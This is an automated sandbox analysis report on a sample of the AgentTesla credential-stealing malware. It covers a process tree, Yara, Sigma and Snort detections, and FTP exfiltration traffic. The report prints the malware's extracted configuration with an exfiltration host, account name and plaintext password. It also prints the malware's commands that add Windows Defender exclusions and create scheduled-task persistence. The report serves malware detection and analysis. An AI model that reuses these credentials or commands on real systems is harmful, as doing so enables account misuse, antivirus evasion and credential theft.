
Windows Analysis Report
hesaphareketi-.exe

Overview

General Information

Sample name: hesaphareketi-.exe
Analysis ID: 1463493
MD5: d8aa0c3eaed283b8d78298748900f395
SHA1: 9899cc61cb992dcfe49a04f4a4209852713b4ab5
SHA256: ce51bc85fa9cf4a581de693c5901e0c03fff712c40f723009e393bad1a18d014
Tags: AgentTesla, exe, geo, TUR

Detection

Detected family: AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareketi-.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: D8AA0C3EAED283B8D78298748900F395)
    • powershell.exe (PID: 3524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hesaphareketi-.exe (PID: 5300 cmdline: "C:\Users\user\Desktop\hesaphareketi-.exe" MD5: D8AA0C3EAED283B8D78298748900F395)
  • xyodEPhulIrkY.exe (PID: 2828 cmdline: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe MD5: D8AA0C3EAED283B8D78298748900F395)
    • schtasks.exe (PID: 4724 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xyodEPhulIrkY.exe (PID: 1628 cmdline: "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe" MD5: D8AA0C3EAED283B8D78298748900F395)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Extracted malware configuration: {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
Yara matches (Source, Rule, Description, Author):
Source: dump.pcap, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Yara matches in memory dumps (Source, Rule, Description, Author):
Source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
(17 entries in this table; not all are shown)

Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):
Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen, Strings:
  • 0x3122b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3129d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31327:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x313b9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31423:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31495:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3152b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x315bb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen, Strings:
  • 0x2e6ae:$s2: GetPrivateProfileString
  • 0x2dd58:$s3: get_OSFullName
  • 0x2f3ea:$s5: remove_Key
  • 0x2f58f:$s5: remove_Key
  • 0x30458:$s6: FtpWebRequest
  • 0x3120d:$s7: logins
  • 0x3177f:$s7: logins
  • 0x34490:$s7: logins
  • 0x34542:$s7: logins
  • 0x35e3e:$s7: logins
  • 0x350dc:$s9: 1.85 (Hash, version 2, native byte-order)
Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
(31 entries in this table; not all are shown)

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 3524, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, ParentImage: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, ParentProcessId: 2828, ParentProcessName: xyodEPhulIrkY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp", ProcessId: 4724, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", ProcessId: 7096, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe", ProcessId: 3524, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-.exe, ParentProcessId: 6516, ParentProcessName: hesaphareketi-.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp", ProcessId: 7096, ProcessName: schtasks.exe

Snort IDS alert for network traffic

Timestamp: 06/27/24-09:16:46.163921, SID: 2855542, Source Port: 49706, Destination Port: 62377, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 06/27/24-09:16:49.864211, SID: 2851779, Source Port: 49708, Destination Port: 51041, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 06/27/24-09:16:49.864211, SID: 2855542, Source Port: 49708, Destination Port: 51041, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 06/27/24-09:16:46.163921, SID: 2851779, Source Port: 49706, Destination Port: 62377, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 06/27/24-09:16:49.222300, SID: 2029927, Source Port: 49707, Destination Port: 21, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 06/27/24-09:16:45.532746, SID: 2029927, Source Port: 49705, Destination Port: 21, Protocol: TCP, Classtype: A Network Trojan was detected


AV Detection

Source: hesaphareketi-.exe, Avira: detected
Source: http://ftp.normagroup.com.tr, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Avira: detection malicious, Label: HEUR/AGEN.1363658
Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, ReversingLabs: Detection: 52%
Source: hesaphareketi-.exe, ReversingLabs: Detection: 52%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Joe Sandbox ML: detected
Source: hesaphareketi-.exe, Joe Sandbox ML: detected
Source: hesaphareketi-.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: hesaphareketi-.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Traffic, Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49705 -> 104.247.165.99:21
Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49706 -> 104.247.165.99:62377
Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49706 -> 104.247.165.99:62377
Source: Traffic, Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49707 -> 104.247.165.99:21
Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49708 -> 104.247.165.99:51041
Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49708 -> 104.247.165.99:51041
Source: global traffic, TCP traffic: 192.168.2.5:49706 -> 104.247.165.99:62377
Source: Joe Sandbox View, IP Address: 104.247.165.99
Source: Joe Sandbox View, ASN Name: ASN-QUADRANET-GLOBALUS
Source: unknown, FTP traffic detected: 104.247.165.99:21 -> 192.168.2.5:49705, server banner:
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 11 of 50 allowed.
  220-Local time is now 10:16. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: ftp.normagroup.com.tr
Source: hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000305C000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ftp.normagroup.com.tr
Source: hesaphareketi-.exe, 00000000.00000002.2067164468.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2098714484.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hesaphareketi-.exe, 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, oAKy.cs, .Net Code: _5754M2
Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, oAKy.cs, .Net Code: _5754M2
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareketi-.exe
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: hesaphareketi-.exe, --.cs, Large array initialization: _0002: array initializer size 576863
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_0229E02C
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B7210
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B8330
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B6E68
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B8658
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B7758
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B0007
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B0040
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B71FE
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B724A
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 0_2_049B83D1
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_01709400
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_01709BB8
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_01704A60
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_01703E48
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_0170CE38
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_01704190
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A2EF8
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A56B8
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A3F28
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065ADC00
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065ABCD0
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A8B62
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A0040
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A3630
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_065A4FD8
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_066EF0E8
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_066E1128
Source: C:\Users\user\Desktop\hesaphareketi-.exe, Code function: 8_2_066E1122
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_00B2E02C
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA7210
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA8320
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA6E68
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA8658
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA7758
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA0006
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA0040
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA71FE
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA724A
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04BA83D1
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04D4C3E7
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04D4B6B0
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04D483C8
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 9_2_04D4EFF8
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_01134190
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_01134A60
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_0113CF00
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_01133E48
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_0113BE76
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FABCD0
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA3F28
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA2EF8
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA56B8
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA0040
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FADBF0
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA8B62
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA4FD8
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_05FA361F
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe, Code function: 13_2_06943F98
                    Source: hesaphareketi-.exe, 00000000.00000002.2074474025.0000000004CE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2069027456.000000000360D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2081297927.0000000006020000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2067164468.000000000246B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareketi-.exe
                    Source: hesaphareketi-.exe, 00000000.00000002.2056757452.000000000070E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-.exe
